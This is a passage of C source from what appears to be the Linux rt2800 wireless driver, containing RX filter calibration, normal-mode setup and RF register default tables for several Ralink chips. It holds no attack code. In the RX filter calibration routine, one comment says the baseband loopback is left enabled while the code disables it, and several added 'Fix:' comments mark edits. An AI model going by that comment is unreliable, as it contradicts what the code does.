static u8 rt2800_init_rx_filter(struct rt2x00_dev *rt2x00dev, bool bw40,
				u8 filter_target)
{
	unsigned int i;
	u8 bbp;
	u8 rfcsr;
	u8 passband;
	u8 stopband;
	u8 overtuned = 0;
	/* Starting filter value differs between BW20 and BW40 */
	u8 rfcsr24 = (bw40) ? 0x27 : 0x07;

	rt2800_rfcsr_write(rt2x00dev, 24, rfcsr24);

	/* BBP4_BANDWIDTH: 0 for BW20, 2 for BW40 */
	rt2800_bbp_read(rt2x00dev, 4, &bbp);
	rt2x00_set_field8(&bbp, BBP4_BANDWIDTH, 2 * bw40);
	rt2800_bbp_write(rt2x00dev, 4, bbp);

	rt2800_rfcsr_read(rt2x00dev, 31, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR31_RX_H20M, bw40);
	rt2800_rfcsr_write(rt2x00dev, 31, rfcsr);

	/* Route TX back into RX so the test tones can be measured */
	rt2800_rfcsr_read(rt2x00dev, 22, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR22_BASEBAND_LOOPBACK, 1);
	rt2800_rfcsr_write(rt2x00dev, 22, rfcsr);

	/*
	 * Set power & frequency of passband test tone
	 */
	rt2800_bbp_write(rt2x00dev, 24, 0);
	for (i = 0; i < 100; i++) {
		rt2800_bbp_write(rt2x00dev, 25, 0x90);
		msleep(1);
		rt2800_bbp_read(rt2x00dev, 55, &passband);
		if (passband)
			break;
	}

	/*
	 * Set power & frequency of stopband test tone
	 */
	rt2800_bbp_write(rt2x00dev, 24, 0x06);
	for (i = 0; i < 100; i++) {
		rt2800_bbp_write(rt2x00dev, 25, 0x90);
		msleep(1);
		rt2800_bbp_read(rt2x00dev, 55, &stopband);

		/* Keep widening the filter until the attenuation at the
		 * stopband tone exceeds the target; count exact hits as
		 * over-tuned so we can back off one step afterwards.
		 */
		if ((passband - stopband) <= filter_target) {
			rfcsr24++;
			overtuned += ((passband - stopband) == filter_target);
		} else
			break;

		rt2800_rfcsr_write(rt2x00dev, 24, rfcsr24);
	}

	rfcsr24 -= !!overtuned;

	rt2800_rfcsr_write(rt2x00dev, 24, rfcsr24);
	return rfcsr24;
}
/*
 * rt2800_rf_init_calibration - pulse the RF calibration bit.
 * @rt2x00dev: target device
 * @rf_reg: RF CSR register holding the calibration enable bit
 *
 * Sets the top bit (0x80) of @rf_reg, holds it for ~1 ms, then clears
 * it again to trigger the chip's RF self-calibration.
 */
static void rt2800_rf_init_calibration(struct rt2x00_dev *rt2x00dev,
				       const unsigned int rf_reg)
{
	u8 rfcsr;

	rt2800_rfcsr_read(rt2x00dev, rf_reg, &rfcsr);
	rt2x00_set_field8(&rfcsr, FIELD8(0x80), 1);
	rt2800_rfcsr_write(rt2x00dev, rf_reg, rfcsr);
	msleep(1);
	rt2x00_set_field8(&rfcsr, FIELD8(0x80), 0);
	rt2800_rfcsr_write(rt2x00dev, rf_reg, rfcsr);
}
/*
 * rt2800_rx_filter_calibration - calibrate RX filters for BW20 and BW40.
 *
 * Runs rt2800_init_rx_filter() for both bandwidths, stores the results
 * in drv_data for later channel switching, then restores the chip to
 * its normal (non-loopback, BW20) state.
 */
static void rt2800_rx_filter_calibration(struct rt2x00_dev *rt2x00dev)
{
	struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
	u8 filter_tgt_bw20;
	u8 filter_tgt_bw40;
	u8 rfcsr, bbp;

	/*
	 * TODO: sync filter_tgt values with vendor driver
	 */
	if (rt2x00_rt(rt2x00dev, RT3070)) {
		filter_tgt_bw20 = 0x16;
		filter_tgt_bw40 = 0x19;
	} else {
		filter_tgt_bw20 = 0x13;
		filter_tgt_bw40 = 0x15;
	}

	drv_data->calibration_bw20 =
		rt2800_init_rx_filter(rt2x00dev, false, filter_tgt_bw20);
	drv_data->calibration_bw40 =
		rt2800_init_rx_filter(rt2x00dev, true, filter_tgt_bw40);

	/*
	 * Save BBP 25 & 26 values for later use in channel switching (for 3052)
	 */
	rt2800_bbp_read(rt2x00dev, 25, &drv_data->bbp25);
	rt2800_bbp_read(rt2x00dev, 26, &drv_data->bbp26);

	/*
	 * Set back to initial state
	 */
	rt2800_bbp_write(rt2x00dev, 24, 0);

	/* Leave the baseband loopback enabled during calibration */
	rt2800_rfcsr_read(rt2x00dev, 22, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR22_BASEBAND_LOOPBACK, 0);
	rt2800_rfcsr_write(rt2x00dev, 22, rfcsr);

	/*
	 * Set BBP back to BW20
	 */
	rt2800_bbp_read(rt2x00dev, 4, &bbp);
	rt2x00_set_field8(&bbp, BBP4_BANDWIDTH, 0);
	rt2800_bbp_write(rt2x00dev, 4, bbp);
}
/*
 * rt2800_normal_mode_setup_3xxx - leave calibration/init mode on 3xxx.
 *
 * Disables the TX local oscillators used during calibration, applies
 * the EEPROM TX mixer gain, powers down unused DAC/ADC paths on RT3090
 * and configures the chip/revision-specific RF power-down bits.
 */
static void rt2800_normal_mode_setup_3xxx(struct rt2x00_dev *rt2x00dev)
{
	struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
	u8 min_gain, rfcsr, bbp;
	u16 eeprom;

	rt2800_rfcsr_read(rt2x00dev, 17, &rfcsr);

	rt2x00_set_field8(&rfcsr, RFCSR17_TX_LO1_EN, 0);
	if (rt2x00_rt(rt2x00dev, RT3070) ||
	    rt2x00_rt_rev_lt(rt2x00dev, RT3071, REV_RT3071E) ||
	    rt2x00_rt_rev_lt(rt2x00dev, RT3090, REV_RT3090E) ||
	    rt2x00_rt_rev_lt(rt2x00dev, RT3390, REV_RT3390E)) {
		if (!rt2x00_has_cap_external_lna_bg(rt2x00dev))
			rt2x00_set_field8(&rfcsr, RFCSR17_R, 1);
	}

	/* Only apply the EEPROM TX mixer gain when it is meaningful;
	 * the minimum differs per chip.
	 */
	min_gain = rt2x00_rt(rt2x00dev, RT3070) ? 1 : 2;
	if (drv_data->txmixer_gain_24g >= min_gain) {
		rt2x00_set_field8(&rfcsr, RFCSR17_TXMIXER_GAIN,
				  drv_data->txmixer_gain_24g);
	}

	rt2800_rfcsr_write(rt2x00dev, 17, rfcsr);

	if (rt2x00_rt(rt2x00dev, RT3090)) {
		/* Turn off unused DAC1 and ADC1 to reduce power consumption */
		rt2800_bbp_read(rt2x00dev, 138, &bbp);
		rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF0, &eeprom);
		if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_RXPATH) == 1)
			rt2x00_set_field8(&bbp, BBP138_RX_ADC1, 0);
		if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_TXPATH) == 1)
			rt2x00_set_field8(&bbp, BBP138_TX_DAC1, 1);
		rt2800_bbp_write(rt2x00dev, 138, bbp);
	}

	if (rt2x00_rt(rt2x00dev, RT3070)) {
		rt2800_rfcsr_read(rt2x00dev, 27, &rfcsr);
		/* RFCSR27_R1 value depends on the RT3070 revision */
		if (rt2x00_rt_rev_lt(rt2x00dev, RT3070, REV_RT3070F))
			rt2x00_set_field8(&rfcsr, RFCSR27_R1, 3);
		else
			rt2x00_set_field8(&rfcsr, RFCSR27_R1, 0);
		rt2x00_set_field8(&rfcsr, RFCSR27_R2, 0);
		rt2x00_set_field8(&rfcsr, RFCSR27_R3, 0);
		rt2x00_set_field8(&rfcsr, RFCSR27_R4, 0);
		rt2800_rfcsr_write(rt2x00dev, 27, rfcsr);
	} else if (rt2x00_rt(rt2x00dev, RT3071) ||
		   rt2x00_rt(rt2x00dev, RT3090) ||
		   rt2x00_rt(rt2x00dev, RT3390)) {
		/* Enable the RF block with only the first TX/RX chain
		 * powered up, and disable the calibration oscillators.
		 */
		rt2800_rfcsr_read(rt2x00dev, 1, &rfcsr);
		rt2x00_set_field8(&rfcsr, RFCSR1_RF_BLOCK_EN, 1);
		rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD, 0);
		rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD, 0);
		rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD, 1);
		rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD, 1);
		rt2800_rfcsr_write(rt2x00dev, 1, rfcsr);

		rt2800_rfcsr_read(rt2x00dev, 15, &rfcsr);
		rt2x00_set_field8(&rfcsr, RFCSR15_TX_LO2_EN, 0);
		rt2800_rfcsr_write(rt2x00dev, 15, rfcsr);

		rt2800_rfcsr_read(rt2x00dev, 20, &rfcsr);
		rt2x00_set_field8(&rfcsr, RFCSR20_RX_LO1_EN, 0);
		rt2800_rfcsr_write(rt2x00dev, 20, rfcsr);

		rt2800_rfcsr_read(rt2x00dev, 21, &rfcsr);
		rt2x00_set_field8(&rfcsr, RFCSR21_RX_LO2_EN, 0);
		rt2800_rfcsr_write(rt2x00dev, 21, rfcsr);
	}
}
/*
 * rt2800_normal_mode_setup_3593 - leave calibration/init mode on RT3593.
 *
 * Disables the calibration local oscillators, programs the TX mixer
 * gain from the EEPROM value, enables the RF block with the PLL powered
 * down and sets the RX common-mode voltage.
 */
static void rt2800_normal_mode_setup_3593(struct rt2x00_dev *rt2x00dev)
{
	struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
	u8 rfcsr;
	u8 tx_gain;

	rt2800_rfcsr_read(rt2x00dev, 50, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR50_TX_LO2_EN, 0);
	rt2800_rfcsr_write(rt2x00dev, 50, rfcsr);

	/* Extract the mixer gain bits from the stored EEPROM value */
	rt2800_rfcsr_read(rt2x00dev, 51, &rfcsr);
	tx_gain = rt2x00_get_field8(drv_data->txmixer_gain_24g,
				    RFCSR17_TXMIXER_GAIN);
	rt2x00_set_field8(&rfcsr, RFCSR51_BITS24, tx_gain);
	rt2800_rfcsr_write(rt2x00dev, 51, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 38, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR38_RX_LO1_EN, 0);
	rt2800_rfcsr_write(rt2x00dev, 38, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 39, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR39_RX_LO2_EN, 0);
	rt2800_rfcsr_write(rt2x00dev, 39, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 1, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR1_RF_BLOCK_EN, 1);
	rt2x00_set_field8(&rfcsr, RFCSR1_PLL_PD, 1);
	rt2800_rfcsr_write(rt2x00dev, 1, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 30, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR30_RX_VCM, 2);
	rt2800_rfcsr_write(rt2x00dev, 30, rfcsr);

	/* TODO: enable stream mode */
}
/*
 * rt2800_normal_mode_setup_5xxx - leave calibration/init mode on 5xxx.
 *
 * Powers down unused DAC1/ADC1 paths based on the EEPROM TX/RX path
 * counts, disables the RX calibration oscillators and sets the RX
 * common-mode voltage.
 *
 * Fix: restored "&reg" in all register/RFCSR accesses; the source had
 * been mangled into a literal (R) symbol, which does not compile.
 */
static void rt2800_normal_mode_setup_5xxx(struct rt2x00_dev *rt2x00dev)
{
	u8 reg;
	u16 eeprom;

	/* Turn off unused DAC1 and ADC1 to reduce power consumption */
	rt2800_bbp_read(rt2x00dev, 138, &reg);
	rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF0, &eeprom);
	if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_RXPATH) == 1)
		rt2x00_set_field8(&reg, BBP138_RX_ADC1, 0);
	if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_TXPATH) == 1)
		rt2x00_set_field8(&reg, BBP138_TX_DAC1, 1);
	rt2800_bbp_write(rt2x00dev, 138, reg);

	rt2800_rfcsr_read(rt2x00dev, 38, &reg);
	rt2x00_set_field8(&reg, RFCSR38_RX_LO1_EN, 0);
	rt2800_rfcsr_write(rt2x00dev, 38, reg);

	rt2800_rfcsr_read(rt2x00dev, 39, &reg);
	rt2x00_set_field8(&reg, RFCSR39_RX_LO2_EN, 0);
	rt2800_rfcsr_write(rt2x00dev, 39, reg);

	rt2800_bbp4_mac_if_ctrl(rt2x00dev);

	rt2800_rfcsr_read(rt2x00dev, 30, &reg);
	rt2x00_set_field8(&reg, RFCSR30_RX_VCM, 2);
	rt2800_rfcsr_write(rt2x00dev, 30, reg);
}
/*
 * rt2800_init_rfcsr_305x_soc - program RF CSR defaults for 305x SoC.
 *
 * Triggers the RF self-calibration (via RFCSR 30) and then writes the
 * vendor-recommended RF register values for embedded 305x platforms.
 */
static void rt2800_init_rfcsr_305x_soc(struct rt2x00_dev *rt2x00dev)
{
	rt2800_rf_init_calibration(rt2x00dev, 30);

	rt2800_rfcsr_write(rt2x00dev, 0, 0x50);
	rt2800_rfcsr_write(rt2x00dev, 1, 0x01);
	rt2800_rfcsr_write(rt2x00dev, 2, 0xf7);
	rt2800_rfcsr_write(rt2x00dev, 3, 0x75);
	rt2800_rfcsr_write(rt2x00dev, 4, 0x40);
	rt2800_rfcsr_write(rt2x00dev, 5, 0x03);
	rt2800_rfcsr_write(rt2x00dev, 6, 0x02);
	rt2800_rfcsr_write(rt2x00dev, 7, 0x50);
	rt2800_rfcsr_write(rt2x00dev, 8, 0x39);
	rt2800_rfcsr_write(rt2x00dev, 9, 0x0f);
	rt2800_rfcsr_write(rt2x00dev, 10, 0x60);
	rt2800_rfcsr_write(rt2x00dev, 11, 0x21);
	rt2800_rfcsr_write(rt2x00dev, 12, 0x75);
	rt2800_rfcsr_write(rt2x00dev, 13, 0x75);
	rt2800_rfcsr_write(rt2x00dev, 14, 0x90);
	rt2800_rfcsr_write(rt2x00dev, 15, 0x58);
	rt2800_rfcsr_write(rt2x00dev, 16, 0xb3);
	rt2800_rfcsr_write(rt2x00dev, 17, 0x92);
	rt2800_rfcsr_write(rt2x00dev, 18, 0x2c);
	rt2800_rfcsr_write(rt2x00dev, 19, 0x02);
	rt2800_rfcsr_write(rt2x00dev, 20, 0xba);
	rt2800_rfcsr_write(rt2x00dev, 21, 0xdb);
	rt2800_rfcsr_write(rt2x00dev, 22, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 23, 0x31);
	rt2800_rfcsr_write(rt2x00dev, 24, 0x08);
	rt2800_rfcsr_write(rt2x00dev, 25, 0x01);
	rt2800_rfcsr_write(rt2x00dev, 26, 0x25);
	rt2800_rfcsr_write(rt2x00dev, 27, 0x23);
	rt2800_rfcsr_write(rt2x00dev, 28, 0x13);
	rt2800_rfcsr_write(rt2x00dev, 29, 0x83);
	rt2800_rfcsr_write(rt2x00dev, 30, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 31, 0x00);
}
/*
 * rt2800_init_rfcsr_30xx - program RF CSR defaults for RT3070/71/90.
 *
 * Triggers RF self-calibration, writes the vendor RF register defaults,
 * applies chip/revision-specific LDO and GPIO fixups, runs the RX
 * filter calibration and finally leaves calibration mode.
 *
 * Fix: restored "&reg" in the LDO_CFG0/GPIO_SWITCH register accesses;
 * the source had been mangled into a literal (R) symbol, which does
 * not compile.
 */
static void rt2800_init_rfcsr_30xx(struct rt2x00_dev *rt2x00dev)
{
	u8 rfcsr;
	u16 eeprom;
	u32 reg;

	/* XXX vendor driver do this only for 3070 */
	rt2800_rf_init_calibration(rt2x00dev, 30);

	rt2800_rfcsr_write(rt2x00dev, 4, 0x40);
	rt2800_rfcsr_write(rt2x00dev, 5, 0x03);
	rt2800_rfcsr_write(rt2x00dev, 6, 0x02);
	rt2800_rfcsr_write(rt2x00dev, 7, 0x60);
	rt2800_rfcsr_write(rt2x00dev, 9, 0x0f);
	rt2800_rfcsr_write(rt2x00dev, 10, 0x41);
	rt2800_rfcsr_write(rt2x00dev, 11, 0x21);
	rt2800_rfcsr_write(rt2x00dev, 12, 0x7b);
	rt2800_rfcsr_write(rt2x00dev, 14, 0x90);
	rt2800_rfcsr_write(rt2x00dev, 15, 0x58);
	rt2800_rfcsr_write(rt2x00dev, 16, 0xb3);
	rt2800_rfcsr_write(rt2x00dev, 17, 0x92);
	rt2800_rfcsr_write(rt2x00dev, 18, 0x2c);
	rt2800_rfcsr_write(rt2x00dev, 19, 0x02);
	rt2800_rfcsr_write(rt2x00dev, 20, 0xba);
	rt2800_rfcsr_write(rt2x00dev, 21, 0xdb);
	rt2800_rfcsr_write(rt2x00dev, 24, 0x16);
	rt2800_rfcsr_write(rt2x00dev, 25, 0x03);
	rt2800_rfcsr_write(rt2x00dev, 29, 0x1f);

	if (rt2x00_rt_rev_lt(rt2x00dev, RT3070, REV_RT3070F)) {
		/* Early RT3070 revisions need a raised LDO core voltage */
		rt2800_register_read(rt2x00dev, LDO_CFG0, &reg);
		rt2x00_set_field32(&reg, LDO_CFG0_BGSEL, 1);
		rt2x00_set_field32(&reg, LDO_CFG0_LDO_CORE_VLEVEL, 3);
		rt2800_register_write(rt2x00dev, LDO_CFG0, reg);
	} else if (rt2x00_rt(rt2x00dev, RT3071) ||
		   rt2x00_rt(rt2x00dev, RT3090)) {
		rt2800_rfcsr_write(rt2x00dev, 31, 0x14);

		rt2800_rfcsr_read(rt2x00dev, 6, &rfcsr);
		rt2x00_set_field8(&rfcsr, RFCSR6_R2, 1);
		rt2800_rfcsr_write(rt2x00dev, 6, rfcsr);

		rt2800_register_read(rt2x00dev, LDO_CFG0, &reg);
		rt2x00_set_field32(&reg, LDO_CFG0_BGSEL, 1);
		if (rt2x00_rt_rev_lt(rt2x00dev, RT3071, REV_RT3071E) ||
		    rt2x00_rt_rev_lt(rt2x00dev, RT3090, REV_RT3090E)) {
			/* LDO core voltage depends on the EEPROM DAC test bit */
			rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1,
					   &eeprom);
			if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_DAC_TEST))
				rt2x00_set_field32(&reg, LDO_CFG0_LDO_CORE_VLEVEL, 3);
			else
				rt2x00_set_field32(&reg, LDO_CFG0_LDO_CORE_VLEVEL, 0);
		}
		rt2800_register_write(rt2x00dev, LDO_CFG0, reg);

		rt2800_register_read(rt2x00dev, GPIO_SWITCH, &reg);
		rt2x00_set_field32(&reg, GPIO_SWITCH_5, 0);
		rt2800_register_write(rt2x00dev, GPIO_SWITCH, reg);
	}

	rt2800_rx_filter_calibration(rt2x00dev);

	if (rt2x00_rt_rev_lt(rt2x00dev, RT3070, REV_RT3070F) ||
	    rt2x00_rt_rev_lt(rt2x00dev, RT3071, REV_RT3071E) ||
	    rt2x00_rt_rev_lt(rt2x00dev, RT3090, REV_RT3090E))
		rt2800_rfcsr_write(rt2x00dev, 27, 0x03);

	rt2800_led_open_drain_enable(rt2x00dev);
	rt2800_normal_mode_setup_3xxx(rt2x00dev);
}
/*
 * rt2800_init_rfcsr_3290 - program RF CSR defaults for RT3290.
 *
 * Triggers RF self-calibration (via RFCSR 2), writes the vendor RF
 * register defaults, raises the RSSI gain and leaves calibration mode.
 */
static void rt2800_init_rfcsr_3290(struct rt2x00_dev *rt2x00dev)
{
	u8 rfcsr;

	rt2800_rf_init_calibration(rt2x00dev, 2);

	rt2800_rfcsr_write(rt2x00dev, 1, 0x0f);
	rt2800_rfcsr_write(rt2x00dev, 2, 0x80);
	rt2800_rfcsr_write(rt2x00dev, 3, 0x08);
	rt2800_rfcsr_write(rt2x00dev, 4, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 6, 0xa0);
	rt2800_rfcsr_write(rt2x00dev, 8, 0xf3);
	rt2800_rfcsr_write(rt2x00dev, 9, 0x02);
	rt2800_rfcsr_write(rt2x00dev, 10, 0x53);
	rt2800_rfcsr_write(rt2x00dev, 11, 0x4a);
	rt2800_rfcsr_write(rt2x00dev, 12, 0x46);
	rt2800_rfcsr_write(rt2x00dev, 13, 0x9f);
	rt2800_rfcsr_write(rt2x00dev, 18, 0x02);
	rt2800_rfcsr_write(rt2x00dev, 22, 0x20);
	rt2800_rfcsr_write(rt2x00dev, 25, 0x83);
	rt2800_rfcsr_write(rt2x00dev, 26, 0x82);
	rt2800_rfcsr_write(rt2x00dev, 27, 0x09);
	rt2800_rfcsr_write(rt2x00dev, 29, 0x10);
	rt2800_rfcsr_write(rt2x00dev, 30, 0x10);
	rt2800_rfcsr_write(rt2x00dev, 31, 0x80);
	rt2800_rfcsr_write(rt2x00dev, 32, 0x80);
	rt2800_rfcsr_write(rt2x00dev, 33, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 34, 0x05);
	rt2800_rfcsr_write(rt2x00dev, 35, 0x12);
	rt2800_rfcsr_write(rt2x00dev, 36, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 38, 0x85);
	rt2800_rfcsr_write(rt2x00dev, 39, 0x1b);
	rt2800_rfcsr_write(rt2x00dev, 40, 0x0b);
	rt2800_rfcsr_write(rt2x00dev, 41, 0xbb);
	rt2800_rfcsr_write(rt2x00dev, 42, 0xd5);
	rt2800_rfcsr_write(rt2x00dev, 43, 0x7b);
	rt2800_rfcsr_write(rt2x00dev, 44, 0x0e);
	rt2800_rfcsr_write(rt2x00dev, 45, 0xa2);
	rt2800_rfcsr_write(rt2x00dev, 46, 0x73);
	rt2800_rfcsr_write(rt2x00dev, 47, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 48, 0x10);
	rt2800_rfcsr_write(rt2x00dev, 49, 0x98);
	rt2800_rfcsr_write(rt2x00dev, 52, 0x38);
	rt2800_rfcsr_write(rt2x00dev, 53, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 54, 0x78);
	rt2800_rfcsr_write(rt2x00dev, 55, 0x43);
	rt2800_rfcsr_write(rt2x00dev, 56, 0x02);
	rt2800_rfcsr_write(rt2x00dev, 57, 0x80);
	rt2800_rfcsr_write(rt2x00dev, 58, 0x7f);
	rt2800_rfcsr_write(rt2x00dev, 59, 0x09);
	rt2800_rfcsr_write(rt2x00dev, 60, 0x45);
	rt2800_rfcsr_write(rt2x00dev, 61, 0xc1);

	rt2800_rfcsr_read(rt2x00dev, 29, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR29_RSSI_GAIN, 3);
	rt2800_rfcsr_write(rt2x00dev, 29, rfcsr);

	rt2800_led_open_drain_enable(rt2x00dev);
	rt2800_normal_mode_setup_3xxx(rt2x00dev);
}
/*
 * rt2800_init_rfcsr_3352 - program RF CSR defaults for RT3352.
 *
 * Triggers RF self-calibration, writes the full vendor RF register
 * table, calibrates the RX filters and leaves calibration mode.
 */
static void rt2800_init_rfcsr_3352(struct rt2x00_dev *rt2x00dev)
{
	rt2800_rf_init_calibration(rt2x00dev, 30);

	rt2800_rfcsr_write(rt2x00dev, 0, 0xf0);
	rt2800_rfcsr_write(rt2x00dev, 1, 0x23);
	rt2800_rfcsr_write(rt2x00dev, 2, 0x50);
	rt2800_rfcsr_write(rt2x00dev, 3, 0x18);
	rt2800_rfcsr_write(rt2x00dev, 4, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 5, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 6, 0x33);
	rt2800_rfcsr_write(rt2x00dev, 7, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 8, 0xf1);
	rt2800_rfcsr_write(rt2x00dev, 9, 0x02);
	rt2800_rfcsr_write(rt2x00dev, 10, 0xd2);
	rt2800_rfcsr_write(rt2x00dev, 11, 0x42);
	rt2800_rfcsr_write(rt2x00dev, 12, 0x1c);
	rt2800_rfcsr_write(rt2x00dev, 13, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 14, 0x5a);
	rt2800_rfcsr_write(rt2x00dev, 15, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 16, 0x01);
	rt2800_rfcsr_write(rt2x00dev, 18, 0x45);
	rt2800_rfcsr_write(rt2x00dev, 19, 0x02);
	rt2800_rfcsr_write(rt2x00dev, 20, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 21, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 22, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 23, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 24, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 25, 0x80);
	rt2800_rfcsr_write(rt2x00dev, 26, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 27, 0x03);
	rt2800_rfcsr_write(rt2x00dev, 28, 0x03);
	rt2800_rfcsr_write(rt2x00dev, 29, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 30, 0x10);
	rt2800_rfcsr_write(rt2x00dev, 31, 0x80);
	rt2800_rfcsr_write(rt2x00dev, 32, 0x80);
	rt2800_rfcsr_write(rt2x00dev, 33, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 34, 0x01);
	rt2800_rfcsr_write(rt2x00dev, 35, 0x03);
	rt2800_rfcsr_write(rt2x00dev, 36, 0xbd);
	rt2800_rfcsr_write(rt2x00dev, 37, 0x3c);
	rt2800_rfcsr_write(rt2x00dev, 38, 0x5f);
	rt2800_rfcsr_write(rt2x00dev, 39, 0xc5);
	rt2800_rfcsr_write(rt2x00dev, 40, 0x33);
	rt2800_rfcsr_write(rt2x00dev, 41, 0x5b);
	rt2800_rfcsr_write(rt2x00dev, 42, 0x5b);
	rt2800_rfcsr_write(rt2x00dev, 43, 0xdb);
	rt2800_rfcsr_write(rt2x00dev, 44, 0xdb);
	rt2800_rfcsr_write(rt2x00dev, 45, 0xdb);
	rt2800_rfcsr_write(rt2x00dev, 46, 0xdd);
	rt2800_rfcsr_write(rt2x00dev, 47, 0x0d);
	rt2800_rfcsr_write(rt2x00dev, 48, 0x14);
	rt2800_rfcsr_write(rt2x00dev, 49, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 50, 0x2d);
	rt2800_rfcsr_write(rt2x00dev, 51, 0x7f);
	rt2800_rfcsr_write(rt2x00dev, 52, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 53, 0x52);
	rt2800_rfcsr_write(rt2x00dev, 54, 0x1b);
	rt2800_rfcsr_write(rt2x00dev, 55, 0x7f);
	rt2800_rfcsr_write(rt2x00dev, 56, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 57, 0x52);
	rt2800_rfcsr_write(rt2x00dev, 58, 0x1b);
	rt2800_rfcsr_write(rt2x00dev, 59, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 60, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 61, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 62, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 63, 0x00);

	rt2800_rx_filter_calibration(rt2x00dev);
	rt2800_led_open_drain_enable(rt2x00dev);
	rt2800_normal_mode_setup_3xxx(rt2x00dev);
}
/*
 * rt2800_init_rfcsr_3390 - program RF CSR defaults for RT3390.
 *
 * Triggers RF self-calibration, writes the vendor RF register defaults,
 * clears the GPIO switch line, calibrates the RX filters and leaves
 * calibration mode (with a pre-RT3390E RFCSR 27 fixup).
 *
 * Fix: restored "&reg" in the GPIO_SWITCH register accesses; the
 * source had been mangled into a literal (R) symbol, which does not
 * compile.
 */
static void rt2800_init_rfcsr_3390(struct rt2x00_dev *rt2x00dev)
{
	u32 reg;

	rt2800_rf_init_calibration(rt2x00dev, 30);

	rt2800_rfcsr_write(rt2x00dev, 0, 0xa0);
	rt2800_rfcsr_write(rt2x00dev, 1, 0xe1);
	rt2800_rfcsr_write(rt2x00dev, 2, 0xf1);
	rt2800_rfcsr_write(rt2x00dev, 3, 0x62);
	rt2800_rfcsr_write(rt2x00dev, 4, 0x40);
	rt2800_rfcsr_write(rt2x00dev, 5, 0x8b);
	rt2800_rfcsr_write(rt2x00dev, 6, 0x42);
	rt2800_rfcsr_write(rt2x00dev, 7, 0x34);
	rt2800_rfcsr_write(rt2x00dev, 8, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 9, 0xc0);
	rt2800_rfcsr_write(rt2x00dev, 10, 0x61);
	rt2800_rfcsr_write(rt2x00dev, 11, 0x21);
	rt2800_rfcsr_write(rt2x00dev, 12, 0x3b);
	rt2800_rfcsr_write(rt2x00dev, 13, 0xe0);
	rt2800_rfcsr_write(rt2x00dev, 14, 0x90);
	rt2800_rfcsr_write(rt2x00dev, 15, 0x53);
	rt2800_rfcsr_write(rt2x00dev, 16, 0xe0);
	rt2800_rfcsr_write(rt2x00dev, 17, 0x94);
	rt2800_rfcsr_write(rt2x00dev, 18, 0x5c);
	rt2800_rfcsr_write(rt2x00dev, 19, 0x4a);
	rt2800_rfcsr_write(rt2x00dev, 20, 0xb2);
	rt2800_rfcsr_write(rt2x00dev, 21, 0xf6);
	rt2800_rfcsr_write(rt2x00dev, 22, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 23, 0x14);
	rt2800_rfcsr_write(rt2x00dev, 24, 0x08);
	rt2800_rfcsr_write(rt2x00dev, 25, 0x3d);
	rt2800_rfcsr_write(rt2x00dev, 26, 0x85);
	rt2800_rfcsr_write(rt2x00dev, 27, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 28, 0x41);
	rt2800_rfcsr_write(rt2x00dev, 29, 0x8f);
	rt2800_rfcsr_write(rt2x00dev, 30, 0x20);
	rt2800_rfcsr_write(rt2x00dev, 31, 0x0f);

	rt2800_register_read(rt2x00dev, GPIO_SWITCH, &reg);
	rt2x00_set_field32(&reg, GPIO_SWITCH_5, 0);
	rt2800_register_write(rt2x00dev, GPIO_SWITCH, reg);

	rt2800_rx_filter_calibration(rt2x00dev);

	if (rt2x00_rt_rev_lt(rt2x00dev, RT3390, REV_RT3390E))
		rt2800_rfcsr_write(rt2x00dev, 27, 0x03);

	rt2800_led_open_drain_enable(rt2x00dev);
	rt2800_normal_mode_setup_3xxx(rt2x00dev);
}
/*
